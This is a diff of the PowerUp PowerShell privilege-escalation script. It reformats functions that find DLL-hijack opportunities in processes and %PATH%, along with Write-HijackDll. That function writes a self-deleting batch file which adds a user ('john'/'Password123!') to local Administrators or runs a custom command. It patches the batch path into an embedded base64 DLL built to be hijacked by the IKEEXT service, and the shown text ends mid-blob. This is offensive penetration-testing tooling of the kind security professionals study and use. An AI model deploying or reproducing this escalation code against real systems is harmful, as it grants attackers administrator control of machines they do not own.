                                 $Exclude = $True
                             }
 
-                            if($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\Program Files')) {
+                            if ($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\Program Files')) {
                                 $Exclude = $True
                             }
 
-                            if($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) {
+                            if ($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) {
                                 $Exclude = $True
                             }
 
@@ -2418,6 +3087,7 @@ function Find-ProcessDLLHijack {
                                 $Out | Add-Member Noteproperty 'ProcessPath' $TargetProcess.Path
                                 $Out | Add-Member Noteproperty 'ProcessOwner' $ProcessOwner
                                 $Out | Add-Member Noteproperty 'ProcessHijackableDLL' $ModulePath
+                                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Process')
                                 $Out
                             }
                         }
@@ -2434,42 +3104,49 @@ function Find-ProcessDLLHijack {
 
 function Find-PathDLLHijack {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Finds all directories in the system %PATH% that are modifiable by the current user.
+Finds all directories in the system %PATH% that are modifiable by the current user.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ModifiablePath  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
-        to return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is
-        written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
-        order loading.
+Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
+to return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is
+written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
+order loading.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-PathDLLHijack
+Find-PathDLLHijack
 
-        Finds all %PATH% .DLL hijacking opportunities.
+Finds all %PATH% .DLL hijacking opportunities.
 
-    .LINK
+.OUTPUTS
 
-        http://www.greyhathacker.net/?p=738
+PowerUp.HijackableDLL.Path
+
+.LINK
+
+http://www.greyhathacker.net/?p=738
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.HijackableDLL.Path')]
     [CmdletBinding()]
     Param()
 
-    # use -LiteralPaths so the spaces in %PATH% folders are not tokenized
+    # use -Literal so the spaces in %PATH% folders are not tokenized
     Get-Item Env:Path | Select-Object -ExpandProperty Value | ForEach-Object { $_.split(';') } | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
         $TargetPath = $_
-
-        $ModifidablePaths = $TargetPath | Get-ModifiablePath -LiteralPaths | Where-Object {$_ -and ($_ -ne $Null) -and ($_.ModifiablePath -ne $Null) -and ($_.ModifiablePath.Trim() -ne '')}
-        ForEach($ModifidablePath in $ModifidablePaths) {
-            if($ModifidablePath.ModifiablePath -ne $Null) {
+        $ModifidablePaths = $TargetPath | Get-ModifiablePath -Literal | Where-Object {$_ -and ($Null -ne $_) -and ($Null -ne $_.ModifiablePath) -and ($_.ModifiablePath.Trim() -ne '')}
+        ForEach ($ModifidablePath in $ModifidablePaths) {
+            if ($Null -ne $ModifidablePath.ModifiablePath) {
                 $ModifidablePath | Add-Member Noteproperty '%PATH%' $_
+                $ModifidablePath.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Path')
                 $ModifidablePath
             }
         }
@@ -2479,57 +3156,69 @@ function Find-PathDLLHijack {
 
 function Write-HijackDll {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Patches in the path to a specified .bat (containing the specified command) into a
-        pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.
+Patches in the path to a specified .bat (containing the specified command) into a
+pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        First builds a self-deleting .bat file that executes the specified -Command or local user,
-        to add and writes the.bat out to -BatPath. The BatPath is then patched into a pre-compiled
-        C++ DLL that is built to be hijackable by the IKEEXT service. There are two DLLs, one for
-        x86 and one for x64, and both are contained as base64-encoded strings. The DLL is then
-        written out to the specified OutputFile.
+.DESCRIPTION
+
+First builds a self-deleting .bat file that executes the specified -Command or local user,
+to add and writes the.bat out to -BatPath. The BatPath is then patched into a pre-compiled
+C++ DLL that is built to be hijackable by the IKEEXT service. There are two DLLs, one for
+x86 and one for x64, and both are contained as base64-encoded strings. The DLL is then
+written out to the specified OutputFile.
+
+.PARAMETER DllPath
 
-    .PARAMETER DllPath
+File name to write the generated DLL out to.
 
-        File name to write the generated DLL out to.
+.PARAMETER Architecture
 
-    .PARAMETER Architecture
+The Architecture to generate for the DLL, x86 or x64. If not specified, PowerUp
+will try to automatically determine the correct architecture.
 
-        The Architecture to generate for the DLL, x86 or x64. If not specified, PowerUp
-        will try to automatically determine the correct architecture.
+.PARAMETER BatPath
 
-    .PARAMETER BatPath
+Path to the .bat for the DLL to launch.
 
-        Path to the .bat for the DLL to launch.
+.PARAMETER UserName
 
-    .PARAMETER UserName
+The [domain\]username to add. If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
 
-        The [domain\]username to add. If not given, it defaults to "john".
-        Domain users are not created, only added to the specified localgroup.
+.PARAMETER Password
 
-    .PARAMETER Password
+The password to set for the added user. If not given, it defaults to "Password123!"
 
-        The password to set for the added user. If not given, it defaults to "Password123!"
+.PARAMETER LocalGroup
 
-    .PARAMETER LocalGroup
+Local group name to add the user to (default of 'Administrators').
 
-        Local group name to add the user to (default of 'Administrators').
+.PARAMETER Credential
 
-    .PARAMETER Credential
+A [Management.Automation.PSCredential] object specifying the user/password to add.
 
-        A [Management.Automation.PSCredential] object specifying the user/password to add.
+.PARAMETER Command
 
-    .PARAMETER Command
+Custom command to execute instead of user creation.
 
-        Custom command to execute instead of user creation.
+.OUTPUTS
+
+PowerUp.HijackableDLL
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerUp.HijackableDLL')]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True)]
+    Param(
+        [Parameter(Mandatory = $True)]
         [String]
         [ValidateNotNullOrEmpty()]
         $DllPath,
@@ -2552,7 +3241,8 @@ function Write-HijackDll {
         $LocalGroup = 'Administrators',
 
         [Management.Automation.PSCredential]
-        $Credential,
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
         [String]
         [ValidateNotNullOrEmpty()]
@@ -2561,34 +3251,35 @@ function Write-HijackDll {
 
     function local:Invoke-PatchDll {
     <#
-        .SYNOPSIS
+    .SYNOPSIS
 
-            Helpers that patches a string in a binary byte array.
+    Helpers that patches a string in a binary byte array.
 
-        .PARAMETER DllBytes
+    .PARAMETER DllBytes
 
-            The binary blob to patch.
+    The binary blob to patch.
 
-        .PARAMETER SearchString
+    .PARAMETER SearchString
 
-            The string to replace in the blob.
+    The string to replace in the blob.
 
-        .PARAMETER ReplaceString
+    .PARAMETER ReplaceString
 
-            The string to replace SearchString with.
+    The string to replace SearchString with.
     #>
 
+        [OutputType('System.Byte[]')]
         [CmdletBinding()]
-        param(
-            [Parameter(Mandatory=$True)]
+        Param(
+            [Parameter(Mandatory = $True)]
             [Byte[]]
             $DllBytes,
 
-            [Parameter(Mandatory=$True)]
+            [Parameter(Mandatory = $True)]
             [String]
             $SearchString,
 
-            [Parameter(Mandatory=$True)]
+            [Parameter(Mandatory = $True)]
             [String]
             $ReplaceString
         )
@@ -2599,7 +3290,7 @@ function Write-HijackDll {
         $S = [System.Text.Encoding]::ASCII.GetString($DllBytes)
         $Index = $S.IndexOf($SearchString)
 
-        if($Index -eq 0) {
+        if ($Index -eq 0) {
             throw("Could not find string $SearchString !")
         }
 
@@ -2610,11 +3301,11 @@ function Write-HijackDll {
         return $DllBytes
     }
 
-    if($PSBoundParameters['Command']) {
+    if ($PSBoundParameters['Command']) {
         $BatCommand = $Command
     }
     else {
-        if($PSBoundParameters['Credential']) {
+        if ($PSBoundParameters['Credential']) {
             $UserNameToAdd = $Credential.UserName
             $PasswordToAdd = $Credential.GetNetworkCredential().Password
         }
@@ -2623,7 +3314,7 @@ function Write-HijackDll {
             $PasswordToAdd = $Password
         }
 
-        if($UserNameToAdd.Contains('\')) {
+        if ($UserNameToAdd.Contains('\')) {
             # only adding a domain user to the local group, no user creation
             $BatCommand = "net localgroup $LocalGroup $UserNameToAdd /add"
         }
@@ -2637,24 +3328,24 @@ function Write-HijackDll {
     $DllBytes32 = "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